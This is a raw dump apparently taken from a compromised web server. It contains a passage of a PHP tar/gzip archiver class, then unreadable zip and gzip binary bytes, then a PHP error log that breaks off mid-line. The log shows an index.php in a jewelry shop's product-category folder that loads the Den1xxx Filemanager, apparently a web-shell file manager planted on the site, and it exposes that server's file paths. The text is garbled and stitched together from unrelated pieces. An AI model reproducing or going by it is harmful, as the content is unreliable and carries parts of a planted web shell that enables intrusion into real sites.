(!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } PKGBi[5berror_log.tar.gznu[]o6^8kfԇbKfEEQD[j$Rc[?"ZFt|K=tdRn邲VJ5Hߩ;U85UP[ҩ@YkUiO cǝK0OxYxĒdۺqC~7,2 &1x}y.^^B/(Bhksu#ʻpy{6~f^(͗epVR˅A%7ԋ4mOK_΀Y%+////Z8ofab+ܴ:f ߫ k0B+ASNgRkܝd|Ssc+ dA/^дn\P?yfF4^k4!hN|$t:$9xhIN4$'oMG 6є'7NɌtdڽhx;vI=\S 8+S%>\o^ \i1M qcrkz_~It$( 4gO?8r\PKGBi[T?}} error_lognu[[03-Nov-2025 17:36:00 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 17:36:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 17:36:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 17:36:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 17:36:24 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 18:06:37 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 18:06:59 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 18:06:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 18:07:08 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 18:07:08 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 19:02:34 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:02:34 UTC] PHP Warning: Undefined variable $ext in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 1118 [03-Nov-2025 19:02:47 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:02:57 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 19:02:57 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 19:03:14 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 19:03:14 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 19:45:49 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:49:04 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:49:50 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:49:56 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:50:05 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:53:06 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [03-Nov-2025 19:53:06 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [03-Nov-2025 19:53:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 19:53:30 UTC] PHP Warning: fileperms(): stat failed for /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/error_log.tar.gz in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 137 [03-Nov-2025 19:54:44 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [03-Nov-2025 20:20:12 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [06-Nov-2025 23:00:47 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [07-Nov-2025 02:41:01 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [07-Nov-2025 02:51:04 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [07-Nov-2025 02:51:04 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 596 [07-Nov-2025 02:51:04 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 597 [09-Nov-2025 02:34:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 03:34:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 03:52:34 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:00:36 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:09:34 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:09:34 UTC] PHP Fatal error: Uncaught BadMethodCallException: phar 